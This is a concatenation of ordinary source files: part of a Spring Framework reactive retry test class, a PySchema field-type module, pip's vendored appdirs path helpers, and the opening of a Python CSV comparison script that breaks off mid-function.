ctx.registerBeanDefinition("config", new RootBeanDefinition(EnablingConfig.class));
MethodRetryEventListener listener = new MethodRetryEventListener();
ctx.addApplicationListener(listener);
ctx.refresh();
AnnotatedMethodBean proxy = ctx.getBean(AnnotatedMethodBean.class);
AnnotatedMethodBean target = (AnnotatedMethodBean) AopProxyUtils.getSingletonTarget(proxy);
Method method1 = AnnotatedMethodBean.class.getMethod("retryOperation");
assertThatIllegalStateException()
.isThrownBy(() -> proxy.retryOperation().block())
.satisfies(isRetryExhaustedException());
assertThat(target.counter).hasValue(6);
assertThat(listener.events).hasSize(7);
for (int i = 0; i < 6; i++) {
String msg = Integer.toString(i + 1);
assertThat(listener.events.get(i))
.satisfies(event -> assertThat(event.getMethod()).isEqualTo(method1))
.satisfies(event -> assertThat(event.getFailure()).hasMessage(msg).isInstanceOf(IOException.class))
.satisfies(event -> assertThat(event.isRetryAborted()).isFalse());
}
assertThat(listener.events.get(6))
.satisfies(event -> assertThat(event.getMethod()).isEqualTo(method1))
.satisfies(event -> assertThat(event.getFailure()).satisfies(isRetryExhaustedException()))
.satisfies(event -> assertThat(event.isRetryAborted()).isTrue());
listener.events.clear();
target.counter.set(0);
assertThatNoException().isThrownBy(() -> proxy.retryOperationWithInitialSuccess().block());
assertThat(target.counter).hasValue(1);
assertThat(listener.events).isEmpty();
target.counter.set(0);
Method method2 = AnnotatedMethodBean.class.getMethod("retryOperationWithSuccessAfterInitialFailure");
assertThatNoException().isThrownBy(() -> proxy.retryOperationWithSuccessAfterInitialFailure().block());
assertThat(target.counter).hasValue(2);
assertThat(listener.events).hasSize(1);
assertThat(listener.events.get(0))
.satisfies(event -> assertThat(event.getMethod()).isEqualTo(method2))
.satisfies(event -> assertThat(event.getFailure()).hasMessage("1").isInstanceOf(IOException.class))
.satisfies(event -> assertThat(event.isRetryAborted()).isFalse());
}
@Test
void adaptReactiveResultWithMinimalRetrySpec() {
// Test minimal retry configuration: maxRetries=1, delay=0, jitter=0, multiplier=1.0, maxDelay=0
MinimalRetryBean target = new MinimalRetryBean();
ProxyFactory pf = new ProxyFactory();
pf.setTarget(target);
pf.addAdvice(new SimpleRetryInterceptor(
new MethodRetrySpec((m, t) -> true, 1, Duration.ZERO, Duration.ZERO, 1.0, Duration.ZERO)));
MinimalRetryBean proxy = (MinimalRetryBean) pf.getProxy();
// Should execute only 2 times, because maxRetries=1 means 1 call + 1 retry
assertThatIllegalStateException()
.isThrownBy(() -> proxy.retryOperation().block())
.satisfies(isRetryExhaustedException())
.havingCause()
.isInstanceOf(IOException.class)
.withMessage("2");
assertThat(target.counter).hasValue(2);
}
@Test
void adaptReactiveResultWithZeroAttempts() {
// Test minimal retry configuration: maxRetries=1, delay=0, jitter=0, multiplier=1.0, maxDelay=0
MinimalRetryBean target = new MinimalRetryBean();
ProxyFactory pf = new ProxyFactory();
pf.setTarget(target);
pf.addAdvice(new SimpleRetryInterceptor(
new MethodRetrySpec((m, t) -> true, 0, Duration.ZERO, Duration.ZERO, 1.0, Duration.ZERO)));
MinimalRetryBean proxy = (MinimalRetryBean) pf.getProxy();
// Should execute only 1 time, because maxRetries=0 means initial call only
assertThatIllegalStateException()
.isThrownBy(() -> proxy.retryOperation().block())
.satisfies(isRetryExhaustedException())
.havingCause()
.isInstanceOf(IOException.class)
.withMessage("1");
assertThat(target.counter).hasValue(1);
}
@Test
void adaptReactiveResultWithZeroDelayAndJitter() {
// Test case where delay=0 and jitter>0
ZeroDelayJitterBean target = new ZeroDelayJitterBean();
ProxyFactory pf = new ProxyFactory();
pf.setTarget(target);
pf.addAdvice(new SimpleRetryInterceptor(
new MethodRetrySpec((m, t) -> true, 3, Duration.ZERO, Duration.ofMillis(10), 2.0, Duration.ofMillis(100))));
ZeroDelayJitterBean proxy = (ZeroDelayJitterBean) pf.getProxy();
assertThatIllegalStateException()
.isThrownBy(() -> proxy.retryOperation().block())
.satisfies(isRetryExhaustedException())
.havingCause()
.isInstanceOf(IOException.class)
.withMessage("4");
assertThat(target.counter).hasValue(4);
}
@Test
void adaptReactiveResultWithJitterGreaterThanDelay() {
// Test case where jitter > delay
JitterGreaterThanDelayBean target = new JitterGreaterThanDelayBean();
ProxyFactory pf = new ProxyFactory();
pf.setTarget(target);
pf.addAdvice(new SimpleRetryInterceptor(
new MethodRetrySpec((m, t) -> true, 3, Duration.ofMillis(5), Duration.ofMillis(20), 1.5, Duration.ofMillis(50))));
JitterGreaterThanDelayBean proxy = (JitterGreaterThanDelayBean) pf.getProxy();
assertThatIllegalStateException()
.isThrownBy(() -> proxy.retryOperation().block())
.satisfies(isRetryExhaustedException())
.havingCause()
.isInstanceOf(IOException.class)
.withMessage("4");
assertThat(target.counter).hasValue(4);
}
@Test
void adaptReactiveResultWithFluxMultiValue() {
// Test Flux multi-value stream case
FluxMultiValueBean target = new FluxMultiValueBean();
ProxyFactory pf = new ProxyFactory();
pf.setTarget(target);
pf.addAdvice(new SimpleRetryInterceptor(
new MethodRetrySpec((m, t) -> true, 3, Duration.ofMillis(10), Duration.ofMillis(5), 2.0, Duration.ofMillis(100))));
FluxMultiValueBean proxy = (FluxMultiValueBean) pf.getProxy();
assertThatIllegalStateException()
.isThrownBy(() -> proxy.retryOperation().blockFirst())
.satisfies(isRetryExhaustedException())
.havingCause()
.isInstanceOf(IOException.class)
.withMessage("4");
assertThat(target.counter).hasValue(4);
}
@Test
void adaptReactiveResultWithSuccessfulOperation() {
// Test successful return case, ensuring retry mechanism doesn't activate
SuccessfulOperationBean target = new SuccessfulOperationBean();
ProxyFactory pf = new ProxyFactory();
pf.setTarget(target);
pf.addAdvice(new SimpleRetryInterceptor(
new MethodRetrySpec((m, t) -> true, 5, Duration.ofMillis(10), Duration.ofMillis(5), 2.0, Duration.ofMillis(100))));
SuccessfulOperationBean proxy = (SuccessfulOperationBean) pf.getProxy();
String result = proxy.retryOperation().block();
assertThat(result).isEqualTo("success");
// Should execute only once because of successful return
assertThat(target.counter).hasValue(1);
}
@Test
void adaptReactiveResultWithAlwaysFailingOperation() {
// Test "always fails" case, ensuring retry mechanism stops after maxRetries (3)
AlwaysFailsBean target = new AlwaysFailsBean();
ProxyFactory pf = new ProxyFactory();
pf.setTarget(target);
pf.addAdvice(new SimpleRetryInterceptor(
new MethodRetrySpec((m, t) -> true, 3, Duration.ofMillis(10), Duration.ofMillis(5), 1.5, Duration.ofMillis(50))));
AlwaysFailsBean proxy = (AlwaysFailsBean) pf.getProxy();
assertThatIllegalStateException()
.isThrownBy(() -> proxy.retryOperation().block())
.satisfies(isRetryExhaustedException())
.havingCause()
.isInstanceOf(NumberFormatException.class)
.withMessage("always fails");
// 1 initial attempt + 3 retries
assertThat(target.counter).hasValue(4);
}
@Nested
class TimeoutTests {
private final AnnotatedMethodBean proxy = getProxiedAnnotatedMethodBean();
private final AnnotatedMethodBean target = (AnnotatedMethodBean) AopProxyUtils.getSingletonTarget(proxy);
@Test
void timeoutNotExceededAfterInitialSuccess() {
String result = proxy.retryOperationWithTimeoutNotExceededAfterInitialSuccess().block();
assertThat(result).isEqualTo("success");
// 1 initial attempt + 0 retries
assertThat(target.counter).hasValue(1);
}
@Test
void timeoutNotExceededAndRetriesExhausted() {
assertThatIllegalStateException()
.isThrownBy(() -> proxy.retryOperationWithTimeoutNotExceededAndRetriesExhausted().block())
.satisfies(isRetryExhaustedException())
.havingCause()
.isInstanceOf(IOException.class)
.withMessage("4");
// 1 initial attempt + 3 retries
assertThat(target.counter).hasValue(4);
}
@Test
void timeoutExceededAfterInitialFailure() {
assertThatRuntimeException()
.isThrownBy(() -> proxy.retryOperationWithTimeoutExceededAfterInitialFailure().block())
.satisfies(isReactiveException())
.havingCause()
.isInstanceOf(TimeoutException.class)
.withMessageContaining("within 20ms");
// 1 initial attempt + 0 retries
assertThat(target.counter).hasValue(1);
}
@Test
void timeoutExceededAfterFirstDelayButBeforeFirstRetry() {
assertThatRuntimeException()
.isThrownBy(() -> proxy.retryOperationWithTimeoutExceededAfterFirstDelayButBeforeFirstRetry().block())
.satisfies(isReactiveException())
.havingCause()
.isInstanceOf(TimeoutException.class)
.withMessageContaining("within 20ms");
// 1 initial attempt + 0 retries
assertThat(target.counter).hasValue(1);
}
@Test
void timeoutExceededAfterFirstRetry() {
assertThatRuntimeException()
.isThrownBy(() -> proxy.retryOperationWithTimeoutExceededAfterFirstRetry().block())
.satisfies(isReactiveException())
.havingCause()
.isInstanceOf(TimeoutException.class)
.withMessageContaining("within 20ms");
// 1 initial attempt + 1 retry
assertThat(target.counter).hasValue(2);
}
@Test
void timeoutExceededAfterSecondRetry() {
assertThatRuntimeException()
.isThrownBy(() -> proxy.retryOperationWithTimeoutExceededAfterSecondRetry().block())
.satisfies(isReactiveException())
.havingCause()
.isInstanceOf(TimeoutException.class)
.withMessageContaining("within 20ms");
// 1 initial attempt + 2 retries
assertThat(target.counter).hasValue(3);
}
}
private static ThrowingConsumer<? super Throwable> isReactiveException() {
return ex -> assertThat(ex.getClass().getName()).isEqualTo("reactor.core.Exceptions$ReactiveException");
}
private static ThrowingConsumer<? super Throwable> isRetryExhaustedException() {
return ex -> assertThat(ex).matches(Exceptions::isRetryExhausted, "is RetryExhaustedException");
}
private static AnnotatedMethodBean getProxiedAnnotatedMethodBean() {
BeanFactory bf = createBeanFactoryFor(AnnotatedMethodBean.class);
return bf.getBean(AnnotatedMethodBean.class);
}
private static AnnotatedClassBean getProxiedAnnotatedClassBean() {
BeanFactory bf = createBeanFactoryFor(AnnotatedClassBean.class);
return bf.getBean(AnnotatedClassBean.class);
}
private static BeanFactory createBeanFactoryFor(Class<?> beanClass) {
/*
DefaultListableBeanFactory bf = new DefaultListableBeanFactory();
bf.registerBeanDefinition("bean", new RootBeanDefinition(beanClass));
RetryAnnotationBeanPostProcessor bpp = new RetryAnnotationBeanPostProcessor();
bpp.setBeanFactory(bf);
bf.addBeanPostProcessor(bpp);
*/
GenericApplicationContext bf = new GenericApplicationContext();
bf.registerBeanDefinition("bean", new RootBeanDefinition(beanClass));
bf.registerBeanDefinition("processor", new RootBeanDefinition(RetryAnnotationBeanPostProcessor.class));
bf.registerBeanDefinition("listener", new RootBeanDefinition(MethodRetryEventListener.class));
bf.refresh();
return bf;
}
static class NonAnnotatedBean {
AtomicInteger counter = new AtomicInteger();
public Mono<Object> retryOperation() {
return Mono.fromCallable(() -> {
counter.incrementAndGet();
throw new IOException(counter.toString());
});
}
}
static class AnnotatedMethodBean {
AtomicInteger counter = new AtomicInteger();
@Retryable(maxRetries = 5, delay = 10)
public Mono<Object> retryOperation() {
return Mono.fromCallable(() -> {
counter.incrementAndGet();
throw new IOException(counter.toString());
});
}
@Retryable(maxRetries = 5, delay = 10)
public Mono<String> retryOperationWithInitialSuccess() {
return Mono.fromCallable(() -> {
counter.incrementAndGet();
return "success";
});
}
@Retryable(maxRetries = 5, delay = 10)
public Mono<String> retryOperationWithSuccessAfterInitialFailure() {
return Mono.fromCallable(() -> {
if (counter.incrementAndGet() == 1) {
throw new IOException(counter.toString());
}
return "success";
});
}
@Retryable(timeout = 555, delay = 10)
public Mono<String> retryOperationWithTimeoutNotExceededAfterInitialSuccess() {
return Mono.fromCallable(() -> {
counter.incrementAndGet();
return "success";
});
}
@Retryable(timeout = 555, delay = 10)
public Mono<Object> retryOperationWithTimeoutNotExceededAndRetriesExhausted() {
return Mono.fromCallable(() -> {
counter.incrementAndGet();
throw new IOException(counter.toString());
});
}
@Retryable(timeout = 20, delay = 0)
public Mono<Object> retryOperationWithTimeoutExceededAfterInitialFailure() {
return Mono.fromCallable(() -> {
counter.incrementAndGet();
Thread.sleep(100);
throw new IOException(counter.toString());
});
}
@Retryable(timeout = 20, delay = 100) // Delay > Timeout
public Mono<Object> retryOperationWithTimeoutExceededAfterFirstDelayButBeforeFirstRetry() {
return Mono.fromCallable(() -> {
counter.incrementAndGet();
throw new IOException(counter.toString());
});
}
@Retryable(timeout = 20, delay = 0)
public Mono<Object> retryOperationWithTimeoutExceededAfterFirstRetry() {
return Mono.fromCallable(() -> {
counter.incrementAndGet();
if (counter.get() == 2) {
Thread.sleep(100);
}
throw new IOException(counter.toString());
});
}
@Retryable(timeout = 20, delay = 0)
public Mono<Object> retryOperationWithTimeoutExceededAfterSecondRetry() {
return Mono.fromCallable(() -> {
counter.incrementAndGet();
if (counter.get() == 3) {
Thread.sleep(100);
}
throw new IOException(counter.toString());
});
}
}
@Retryable(delay = 10, jitter = 5, multiplier = 2.0, maxDelay = 40,
includes = IOException.class, excludes = AccessDeniedException.class,
predicate = RejectMalformedInputException3Predicate.class)
static class AnnotatedClassBean {
AtomicInteger counter = new AtomicInteger();
public Mono<Object> ioOperation() {
return Mono.fromCallable(() -> {
counter.incrementAndGet();
if (counter.get() == 3) {
throw new MalformedInputException(counter.get());
}
throw new IOException(counter.toString());
});
}
public Mono<Object> fileSystemOperation() {
return Mono.fromCallable(() -> {
counter.incrementAndGet();
throw new FileSystemException(counter.toString());
});
}
public Mono<Object> fileSystemOperationWithNestedException() {
return Mono.fromCallable(() -> {
counter.incrementAndGet();
throw new RuntimeException(new FileSystemException(counter.toString()));
});
}
public Mono<Object> accessOperation() {
return Mono.fromCallable(() -> {
counter.incrementAndGet();
throw new AccessDeniedException(counter.toString());
});
}
public Mono<Object> arithmeticOperation() {
return Mono.fromCallable(() -> {
counter.incrementAndGet();
throw new ArithmeticException(counter.toString());
});
}
@Retryable(includes = IOException.class, maxRetries = 1, delay = 10)
public Flux<Object> overrideOperation() {
return Flux.from(Mono.fromCallable(() -> {
counter.incrementAndGet();
throw new AccessDeniedException(counter.toString());
}));
}
}
@EnableResilientMethods
static class EnablingConfig {
}
// Bean classes for boundary testing
static class MinimalRetryBean {
AtomicInteger counter = new AtomicInteger();
public Mono<Object> retryOperation() {
return Mono.fromCallable(() -> {
counter.incrementAndGet();
throw new IOException(counter.toString());
});
}
}
static class ZeroDelayJitterBean {
AtomicInteger counter = new AtomicInteger();
public Mono<Object> retryOperation() {
return Mono.fromCallable(() -> {
counter.incrementAndGet();
throw new IOException(counter.toString());
});
}
}
static class JitterGreaterThanDelayBean {
AtomicInteger counter = new AtomicInteger();
public Mono<Object> retryOperation() {
return Mono.fromCallable(() -> {
counter.incrementAndGet();
throw new IOException(counter.toString());
});
}
}
static class FluxMultiValueBean {
AtomicInteger counter = new AtomicInteger();
public Flux<Object> retryOperation() {
return Flux.from(Mono.fromCallable(() -> {
counter.incrementAndGet();
throw new IOException(counter.toString());
}));
}
}
static class SuccessfulOperationBean {
AtomicInteger counter = new AtomicInteger();
public Mono<String> retryOperation() {
return Mono.fromCallable(() -> {
counter.incrementAndGet();
return "success";
});
}
}
static class AlwaysFailsBean {
AtomicInteger counter = new AtomicInteger();
public Mono<Object> retryOperation() {
return Mono.fromCallable(() -> {
counter.incrementAndGet();
throw new NumberFormatException("always fails");
});
}
}
} | java | github | https://github.com/spring-projects/spring-framework | spring-context/src/test/java/org/springframework/resilience/ReactiveRetryInterceptorTests.java |
# Copyright (c) 2013 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
import datetime
import core
import copy
from core import ParseError, Field, auto_store, PySchema
import binascii
try:
from collections import OrderedDict
except ImportError:
from ordereddict import OrderedDict
def ordereddict_push_front(dct, key, value):
"""Set a value at the front of an OrderedDict
The original dict isn't modified, instead a copy is returned
"""
d = OrderedDict()
d[key] = value
d.update(dct)
return d
class Text(Field):
def load(self, obj):
if not isinstance(obj, (unicode, type(None))):
raise ParseError("%r not a unicode object" % obj)
return obj
def dump(self, obj):
if isinstance(obj, (unicode, type(None))):
return obj
else:
try:
return obj.decode('utf8')
except:
raise ValueError(
"%r is not a valid UTF-8 string" % obj
)
class Bytes(Field):
"""Binary data"""
def __init__(self, custom_encoding=False, **kwargs):
super(Bytes, self).__init__(**kwargs)
self.custom_encoding = custom_encoding
def _load_utf8_codepoints(self, obj):
return obj.encode("iso-8859-1")
def _dump_utf8_codepoints(self, binary_data):
return binary_data.decode("iso-8859-1")
def _load_b64(self, obj):
return binascii.a2b_base64(obj.encode("ascii"))
def _dump_b64(self, binary_data):
return binascii.b2a_base64(binary_data).rstrip('\n')
def load(self, obj):
if not self.custom_encoding:
return self._load_utf8_codepoints(obj)
return self._load_b64(obj)
def dump(self, binary_data):
if isinstance(binary_data, unicode):
raise ValueError(
"Unicode objects are not accepted values for Bytes (%r)"
% (binary_data,)
)
if not self.custom_encoding:
return self._dump_utf8_codepoints(binary_data)
return self._dump_b64(binary_data)
def is_similar_to(self, other):
return super(Bytes, self).is_similar_to(other) and self.custom_encoding == other.custom_encoding
class List(Field):
"""List of one other Field type
Differs from other fields in that it is not nullable
and defaults to empty array instead of null
"""
def __init__(self, field_type=Text(), nullable=False, default=[], **kwargs):
super(List, self).__init__(nullable=nullable, default=default, **kwargs)
self.field_type = field_type
def load(self, obj):
if not isinstance(obj, list):
raise ParseError("%r is not a list object" % obj)
return [self.field_type.load(o) for o in obj]
def dump(self, obj):
if not isinstance(obj, (tuple, list)):
raise ValueError("%r is not a list object" % obj)
return [self.field_type.dump(o) for o in obj]
def set_parent(self, schema):
self.field_type.set_parent(schema)
def default_value(self):
# avoid default-sharing between records
return copy.deepcopy(self.default)
def is_similar_to(self, other):
return super(List, self).is_similar_to(other) and self.field_type.is_similar_to(other.field_type)
def repr_vars(self):
return ordereddict_push_front(
super(List, self).repr_vars(),
"field_type",
repr(self.field_type)
)
class Enum(Field):
_field_type = Text() # don't change
def __init__(self, values, name=None, **kwargs):
super(Enum, self).__init__(**kwargs)
self.values = set(values)
self.name = name
if name is not None and PySchema.auto_register:
auto_store.add_enum(self)
def dump(self, obj):
if obj not in self.values:
raise ValueError(
"%r is not an allowed value of Enum%r"
% (obj, tuple(self.values)))
return self._field_type.dump(obj)
def load(self, obj):
parsed = self._field_type.load(obj)
if parsed not in self.values and parsed is not None:
raise ParseError(
"Parsed value %r not in allowed value of Enum(%r)"
% (parsed, tuple(self.values)))
return parsed
def is_similar_to(self, other):
return super(Enum, self).is_similar_to(other) and self.values == other.values
def repr_vars(self):
return OrderedDict([
("values", self.values),
("name", repr(self.name))
] + super(Enum, self).repr_vars().items()
)
class Integer(Field):
def __init__(self, size=8, **kwargs):
super(Integer, self).__init__(**kwargs)
self.size = size
def dump(self, obj):
if not isinstance(obj, (int, long, type(None))) or isinstance(obj, bool):
raise ValueError("%r is not a valid Integer" % (obj,))
return obj
def load(self, obj):
if not isinstance(obj, (int, long, type(None))) or isinstance(obj, bool):
raise ParseError("%r is not a valid Integer" % (obj,))
return obj
def is_similar_to(self, other):
return super(Integer, self).is_similar_to(other) and self.size == other.size
def repr_vars(self):
return ordereddict_push_front(
super(Integer, self).repr_vars(),
"size",
self.size
)
class Boolean(Field):
VALUE_MAP = {True: '1', 1: '1',
False: '0', 0: '0'}
def dump(self, obj):
if obj not in self.VALUE_MAP:
raise ValueError(
"Invalid value for Boolean field: %r" % obj)
return bool(obj)
def load(self, obj):
if obj not in self.VALUE_MAP:
raise ParseError(
"Invalid value for Boolean field: %r" % obj)
return bool(obj)
class Float(Field):
def __init__(self, size=8, **kwargs):
super(Float, self).__init__(**kwargs)
self.size = size
def dump(self, obj):
if not isinstance(obj, float):
raise ValueError("Invalid value for Float field: %r" % obj)
return float(obj)
def load(self, obj):
if not isinstance(obj, (float, int, long)):
raise ParseError("Invalid value for Float field: %r" % obj)
return float(obj)
def is_similar_to(self, other):
return super(Float, self).is_similar_to(other) and self.size == other.size
class Date(Text):
def dump(self, obj):
if not isinstance(obj, datetime.date):
raise ValueError("Invalid value for Date field: %r" % obj)
return str(obj)
def load(self, obj):
try:
# This is much faster than calling strptime
(year, month, day) = obj.split('-')
return datetime.date(int(year), int(month), int(day))
except ValueError:
raise ValueError("Invalid value for Date field: %r" % obj)
class DateTime(Text):
def dump(self, obj):
if not isinstance(obj, datetime.datetime):
raise ValueError("Invalid value for DateTime field: %r" % obj)
return str(obj)
def load(self, obj):
try:
if '.' in obj:
return datetime.datetime.strptime(obj, "%Y-%m-%d %H:%M:%S.%f")
return datetime.datetime.strptime(obj, "%Y-%m-%d %H:%M:%S")
except ValueError:
raise ValueError("Invalid value for DateField field: %r" % obj)
# special value for SubRecord's schema parameter
# that signifies a SubRecord accepting records of the
# same type as the container/parent Record.
SELF = object()
class SubRecord(Field):
""""Field for storing other :class:`record.Record`s"""
def __init__(self, schema, **kwargs):
super(SubRecord, self).__init__(**kwargs)
self._schema = schema
def dump(self, obj):
if not isinstance(obj, self._schema):
raise ValueError("%r is not a %r"
% (obj, self._schema))
return core.to_json_compatible(obj)
def load(self, obj):
return core.from_json_compatible(self._schema, obj)
def set_parent(self, schema):
"""This method gets called by the metaclass
once the container class has been created
to let the field store a reference to its
parent if needed. Its needed for SubRecords
in case it refers to the container record.
"""
if self._schema == SELF:
self._schema = schema
def default_value(self):
# avoid default-sharing between records
return copy.deepcopy(self.default)
def is_similar_to(self, other):
return super(SubRecord, self).is_similar_to(other) and self._schema == other._schema
def repr_vars(self):
return ordereddict_push_front(
super(SubRecord, self).repr_vars(),
"schema",
self._schema._schema_name
)
class Map(Field):
"""List of one other Field type
Differs from other fields in that it is not nullable
and defaults to empty array instead of null
"""
def __init__(self, value_type, nullable=False, default={}, **kwargs):
super(Map, self).__init__(nullable=nullable, default=default, **kwargs)
self.value_type = value_type
self.key_type = Text()
def load(self, obj):
return dict([
(self.key_type.load(k),
self.value_type.load(v))
for k, v in obj.iteritems()
])
def dump(self, obj):
if not isinstance(obj, dict):
raise ValueError("%r is not a dict" % (obj,))
return dict([
(self.key_type.dump(k),
self.value_type.dump(v))
for k, v in obj.iteritems()
])
def set_parent(self, schema):
self.value_type.set_parent(schema)
def default_value(self):
# avoid default-sharing between records
return copy.deepcopy(self.default)
def is_similar_to(self, other):
return super(Map, self).is_similar_to(other) and self.value_type.is_similar_to(other.value_type)
def repr_vars(self):
return ordereddict_push_front(
super(Map, self).repr_vars(),
"value_type",
repr(self.value_type)
) | unknown | codeparrot/codeparrot-clean | ||
"""
This code was taken from https://github.com/ActiveState/appdirs and modified
to suit our purposes.
"""
from __future__ import absolute_import
import os
import sys
from pip.compat import WINDOWS, expanduser
from pip._vendor.six import PY2, text_type
def user_cache_dir(appname):
r"""
Return full path to the user-specific cache dir for this application.
"appname" is the name of application.
Typical user cache directories are:
macOS: ~/Library/Caches/<AppName>
Unix: ~/.cache/<AppName> (XDG default)
Windows: C:\Users\<username>\AppData\Local\<AppName>\Cache
On Windows the only suggestion in the MSDN docs is that local settings go
in the `CSIDL_LOCAL_APPDATA` directory. This is identical to the
non-roaming app data dir (the default returned by `user_data_dir`). Apps
typically put cache data somewhere *under* the given dir here. Some
examples:
...\Mozilla\Firefox\Profiles\<ProfileName>\Cache
...\Acme\SuperApp\Cache\1.0
OPINION: This function appends "Cache" to the `CSIDL_LOCAL_APPDATA` value.
"""
if WINDOWS:
# Get the base path
path = os.path.normpath(_get_win_folder("CSIDL_LOCAL_APPDATA"))
# When using Python 2, return paths as bytes on Windows like we do on
# other operating systems. See helper function docs for more details.
if PY2 and isinstance(path, text_type):
path = _win_path_to_bytes(path)
# Add our app name and Cache directory to it
path = os.path.join(path, appname, "Cache")
elif sys.platform == "darwin":
# Get the base path
path = expanduser("~/Library/Caches")
# Add our app name to it
path = os.path.join(path, appname)
else:
# Get the base path
path = os.getenv("XDG_CACHE_HOME", expanduser("~/.cache"))
# Add our app name to it
path = os.path.join(path, appname)
return path
def user_data_dir(appname, roaming=False):
"""
Return full path to the user-specific data dir for this application.
"appname" is the name of application.
If None, just the system directory is returned.
"roaming" (boolean, default False) can be set True to use the Windows
roaming appdata directory. That means that for users on a Windows
network setup for roaming profiles, this user data will be
sync'd on login. See
<http://technet.microsoft.com/en-us/library/cc766489(WS.10).aspx>
for a discussion of issues.
Typical user data directories are:
macOS: ~/Library/Application Support/<AppName>
Unix: ~/.local/share/<AppName> # or in
$XDG_DATA_HOME, if defined
Win XP (not roaming): C:\Documents and Settings\<username>\ ...
...Application Data\<AppName>
Win XP (roaming): C:\Documents and Settings\<username>\Local ...
...Settings\Application Data\<AppName>
Win 7 (not roaming): C:\\Users\<username>\AppData\Local\<AppName>
Win 7 (roaming): C:\\Users\<username>\AppData\Roaming\<AppName>
For Unix, we follow the XDG spec and support $XDG_DATA_HOME.
That means, by default "~/.local/share/<AppName>".
"""
if WINDOWS:
const = roaming and "CSIDL_APPDATA" or "CSIDL_LOCAL_APPDATA"
path = os.path.join(os.path.normpath(_get_win_folder(const)), appname)
elif sys.platform == "darwin":
path = os.path.join(
expanduser('~/Library/Application Support/'),
appname,
)
else:
path = os.path.join(
os.getenv('XDG_DATA_HOME', expanduser("~/.local/share")),
appname,
)
return path
def user_config_dir(appname, roaming=True):
"""Return full path to the user-specific config dir for this application.
"appname" is the name of application.
If None, just the system directory is returned.
"roaming" (boolean, default True) can be set False to not use the
Windows roaming appdata directory. That means that for users on a
Windows network setup for roaming profiles, this user data will be
sync'd on login. See
<http://technet.microsoft.com/en-us/library/cc766489(WS.10).aspx>
for a discussion of issues.
Typical user data directories are:
macOS: same as user_data_dir
Unix: ~/.config/<AppName>
Win *: same as user_data_dir
For Unix, we follow the XDG spec and support $XDG_CONFIG_HOME.
That means, by default "~/.config/<AppName>".
"""
if WINDOWS:
path = user_data_dir(appname, roaming=roaming)
elif sys.platform == "darwin":
path = user_data_dir(appname)
else:
path = os.getenv('XDG_CONFIG_HOME', expanduser("~/.config"))
path = os.path.join(path, appname)
return path
# for the discussion regarding site_config_dirs locations
# see <https://github.com/pypa/pip/issues/1733>
def site_config_dirs(appname):
"""Return a list of potential user-shared config dirs for this application.
"appname" is the name of application.
Typical user config directories are:
macOS: /Library/Application Support/<AppName>/
Unix: /etc or $XDG_CONFIG_DIRS[i]/<AppName>/ for each value in
$XDG_CONFIG_DIRS
Win XP: C:\Documents and Settings\All Users\Application ...
...Data\<AppName>\
Vista: (Fail! "C:\ProgramData" is a hidden *system* directory
on Vista.)
Win 7: Hidden, but writeable on Win 7:
C:\ProgramData\<AppName>\
"""
if WINDOWS:
path = os.path.normpath(_get_win_folder("CSIDL_COMMON_APPDATA"))
pathlist = [os.path.join(path, appname)]
elif sys.platform == 'darwin':
pathlist = [os.path.join('/Library/Application Support', appname)]
else:
# try looking in $XDG_CONFIG_DIRS
xdg_config_dirs = os.getenv('XDG_CONFIG_DIRS', '/etc/xdg')
if xdg_config_dirs:
pathlist = [
os.path.join(expanduser(x), appname)
for x in xdg_config_dirs.split(os.pathsep)
]
else:
pathlist = []
# always look in /etc directly as well
pathlist.append('/etc')
return pathlist
# -- Windows support functions --
def _get_win_folder_from_registry(csidl_name):
"""
This is a fallback technique at best. I'm not sure if using the
registry for this guarantees us the correct answer for all CSIDL_*
names.
"""
import _winreg
shell_folder_name = {
"CSIDL_APPDATA": "AppData",
"CSIDL_COMMON_APPDATA": "Common AppData",
"CSIDL_LOCAL_APPDATA": "Local AppData",
}[csidl_name]
key = _winreg.OpenKey(
_winreg.HKEY_CURRENT_USER,
r"Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
)
directory, _type = _winreg.QueryValueEx(key, shell_folder_name)
return directory
def _get_win_folder_with_ctypes(csidl_name):
csidl_const = {
"CSIDL_APPDATA": 26,
"CSIDL_COMMON_APPDATA": 35,
"CSIDL_LOCAL_APPDATA": 28,
}[csidl_name]
buf = ctypes.create_unicode_buffer(1024)
ctypes.windll.shell32.SHGetFolderPathW(None, csidl_const, None, 0, buf)
# Downgrade to short path name if have highbit chars. See
# <http://bugs.activestate.com/show_bug.cgi?id=85099>.
has_high_char = False
for c in buf:
if ord(c) > 255:
has_high_char = True
break
if has_high_char:
buf2 = ctypes.create_unicode_buffer(1024)
if ctypes.windll.kernel32.GetShortPathNameW(buf.value, buf2, 1024):
buf = buf2
return buf.value
if WINDOWS:
try:
import ctypes
_get_win_folder = _get_win_folder_with_ctypes
except ImportError:
_get_win_folder = _get_win_folder_from_registry
def _win_path_to_bytes(path):
"""Encode Windows paths to bytes. Only used on Python 2.
Motivation is to be consistent with other operating systems where paths
are also returned as bytes. This avoids problems mixing bytes and Unicode
elsewhere in the codebase. For more details and discussion see
<https://github.com/pypa/pip/issues/3463>.
If encoding using ASCII and MBCS fails, return the original Unicode path.
"""
for encoding in ('ASCII', 'MBCS'):
try:
return path.encode(encoding)
except (UnicodeEncodeError, LookupError):
pass
return path | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/env python
import sys
if sys.version_info < (3, 0):
sys.stdout.write("Sorry, Python 3 og higher required\n")
sys.exit(1)
import argparse, pandas
from math import fabs
parser = argparse.ArgumentParser(description='Numerically compare two CSV files')
parser.add_argument('--tol', default=0.02, type=float, help='relative error tolerance (default: 0.02)')
parser.add_argument('--small', default=1e-10, type=float, help='always equal if difference is smaller than this (default: 1e-10)')
parser.add_argument('--quiet', '-q', dest='quiet', action='store_true', help='less output')
parser.add_argument('--csv_sep', default=' ', help='CSV separator (default: " ")')
parser.add_argument('file_ref', help='reference file')
parser.add_argument('file_new', help='new file')
args = parser.parse_args()
returncode = 0
def isapprox(a, b):
return fabs(a - b) < args.small or fabs(a - b) < args.tol * fabs(a)
def isnumber(val):
''' filter to compare only ints and floats '''
return isinstance(val, float) or isinstance(val, int)
def compare(a, b):
''' compare ints and floats to relative tolerence '''
if isnumber(a) and isnumber(b):
return isapprox(a, b)
else:
